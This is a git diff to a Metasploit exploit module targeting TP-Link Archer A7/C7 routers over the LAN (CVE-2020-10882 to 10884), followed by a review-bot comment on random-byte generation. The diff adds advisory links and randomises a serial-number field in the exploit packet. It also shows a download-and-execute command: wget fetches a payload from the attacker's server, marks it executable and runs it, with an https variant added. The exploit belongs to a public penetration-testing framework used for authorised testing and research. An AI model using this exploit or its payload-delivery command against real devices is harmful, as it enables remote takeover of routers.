diff --git a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
index 107649da7a..d0e01d04be 100644
--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# PR: TODO run metasploit-framework/tools/dev/msftidy.rb tplink_archerc7_lan_rce.rb
-# PR: to see and fix the stuff they don't like
-
 require 'openssl'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -38,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
 ],
 'References' =>
 [
- [ 'URL', ''],
+ [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb.md'],
 [ 'CVE', '2020-10882'],
 [ 'CVE', '2020-10883'],
 [ 'CVE', '2020-10884'],
@@ -337,8 +335,7 @@ class MetasploitModule < Msf::Exploit::Remote
 [0x00].pack('S>*') + # packet len
 [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function
 [0x00].pack('C*') + # dunno what this is
- [0xCA,0xFE,0xBA,0xBE].pack('C*') + # serial number, can by any value
- # PR : we should randomise it then! TODO later once it's working
+ [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value
 [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder
 
 srv_host = datastore['SRVHOST']
@@ -360,6 +357,9 @@ class MetasploitModule < Msf::Exploit::Remote
 # Command that will download @payload_exe and execute it
 download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
+ if datastore['SSL']
+ download_cmd = download_cmd.sub("http", "https")
+ end
 http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + srv_port.to_s
 print_status("Starting up our web service on #{http_service} ...")
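Review bot: `rand(0xff)` on the added serial-number line draws from 0..254, so the byte value 0xff can never occur in any of the four positions; if a uniformly random 4-byte serial is the intent, `rand(0x100)` is the correct bound, and `Array.new(4) { rand(0x100) }.pack('C*') + # serial number, can be any value` also removes the fourfold repetition and fixes the `can by` typo that the replaced comment carries over. The comment in the hunk already states the serial is accepted with any value, so this is a correctness-of-intent and readability point rather than a functional one. The packet-building statement this line belongs to starts and ends outside the hunk, as does the enclosing method.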